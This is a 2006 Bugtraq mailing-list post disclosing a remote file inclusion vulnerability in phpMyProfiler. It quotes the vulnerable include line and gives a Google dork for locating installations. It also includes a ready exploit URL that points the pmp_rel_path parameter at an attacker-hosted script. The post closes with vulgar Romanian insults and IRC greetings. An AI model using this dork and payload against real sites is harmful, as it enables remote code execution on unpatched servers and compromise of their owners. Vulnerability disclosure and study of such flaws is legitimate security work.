
Date: 3 Oct 2006 17:20:29 -0000
From: mozi2weed@...oo.com
To: bugtraq@...urityfocus.com
Subject: phpMyProfiler remote file include

# Author: mozi2weed@...oo.com mozi
# phpMyProfiler Remote File Inclusion Vulnerability
# Greetz: Raver #phpfreaks eu.undernet.org
------------------------------------------------------------------
Download: http://sourceforge.net/projects/phpmyprofiler
------------------------------------------------------------------
require_once($pmp_rel_path . '/include/PEAR/HTTP.php');
_________________________________________________________________
googledork:phpMyProfiler 

http://site.com/[path]/functions.php?pmp_rel_path=http://[Evil_scr
ipt]
PS:Whitehat aia de pe undernet sug pula!!!  Lameri boratzi 
#phpfreaks rulz
# heh tnx
 
